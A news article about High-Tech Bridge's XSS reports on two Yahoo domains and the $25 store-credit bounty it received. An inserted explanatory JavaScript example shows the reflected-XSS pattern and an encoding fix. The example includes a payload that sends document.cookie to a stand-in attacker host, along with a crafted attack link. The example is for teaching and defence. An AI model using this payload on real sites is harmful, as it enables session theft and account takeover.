Researchers report XSS flaws to Yahoo, receive $25 store credit as bug bounty


A Swiss penetration testing firm that pointed out cross-site scripting (XSS) flaws affecting two Yahoo domains was disappointed to discover the company's reward for their research.

According to High-Tech Bridge, Yahoo paid $12.50 each for two of the bugs the firm reported to it. High-Tech Bridge had previously found XSS bugs in NASDAQ's website. Furthermore, the money was only redeemable at Yahoo's company store, High-Tech Bridge revealed in a Monday blog post.

The XSS flaws, which affected the ecom.yahoo.com and adserver.yahoo.com domains, could allow any "@Yahoo.com" email account to be compromised if a logged-in user clicked a malicious link crafted by an attacker, the company said: the injected script runs in the victim's browser with the victim's Yahoo session.
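The attack the article describes is a reflected XSS: the page echoes part of the request URL into its HTML without encoding, so a link the victim clicks becomes script executing in the victim's session. The following is an added illustration of that pattern and of the output-encoding fix; it is not Yahoo's code, and the page, the `q` parameter and the payload are hypothetical stand-ins, not the bugs High-Tech Bridge reported.

```javascript
// Added example of the reflected-XSS pattern and its fix. The vulnerable
// page, the "q" parameter and the attacker payload are constructed for
// illustration; none of this is Yahoo's code or the reported bug.

// Hypothetical vulnerable server-side rendering: the "q" query parameter is
// concatenated straight into the HTML response.
function renderSearchPageVulnerable(query) {
  return '<!doctype html><title>Search</title>' +
         '<p>Results for: ' + query + '</p>';
}

// Minimal HTML entity encoder, sufficient for text nodes and for values
// placed inside double-quoted attributes.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened version: encode at the point where untrusted data enters HTML.
function renderSearchPageSafe(query) {
  return '<!doctype html><title>Search</title>' +
         '<p>Results for: ' + escapeHtml(query) + '</p>';
}

// Extract the "q" parameter the way a server would from the request URL.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Constructed attacker link. The payload is URL-encoded so the browser
// delivers it intact; once reflected unencoded, it runs under the victim's
// origin and session, which is why one click can compromise the account.
const PAYLOAD = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>';
const ATTACK_LINK = 'https://victim.invalid/search?q=' + encodeURIComponent(PAYLOAD);

// True when the rendered HTML contains an unencoded <script> element,
// i.e. when the reflected input would execute in the victim's browser.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Renders the same attacker-controlled parameter through both handlers.
function demo() {
  const q = queryFromUrl(ATTACK_LINK);
  return {
    vulnerableExecutes: containsLiveScript(renderSearchPageVulnerable(q)),
    safeExecutes: containsLiveScript(renderSearchPageSafe(q)),
    safeHtml: renderSearchPageSafe(q),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The payload shown exfiltrates `document.cookie`; marking the session cookie `HttpOnly` blocks that particular read but does not stop the script from issuing requests as the logged-in user, so output encoding (and a Content-Security-Policy as defense in depth) is the actual fix, not the cookie flag.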

SCMagazine.com reached out to Yahoo, but did not immediately hear back.

Three XSS bugs were reported to Yahoo as of Sept. 23, and the company responded within 48 hours, offering $12.50 each for just two of the bugs. All of the vulnerabilities have since been patched by Yahoo, High-Tech Bridge said.

The company discovered the XSS flaws after beginning an experiment to see "how quickly security vulnerabilities on well-known websites such as Yahoo can be found" and how long it would take to receive a response, the company blog post said.

In a Tuesday email, Ilia Kolochenko, CEO at High-Tech Bridge, told SCMagazine.com that even where the financial reward is small, companies could do a better job of providing other incentives for security researchers who report their discoveries.

"Few companies today pay enough money to security researchers to motivate them only by money," Kolochenko wrote. "Even the amounts paid by Google are not high enough to be a sole motivation for researchers. However, when a company also offers a public 'thank you,' such as listing in [a] hall of fame, it can be a good added-value for many security professionals."

Kolochenko told SCMagazine.com that he inquired about a program that recognized researchers' findings. Yahoo's security team emailed him back saying they did not have a hall of fame program, but that things could change in the future.
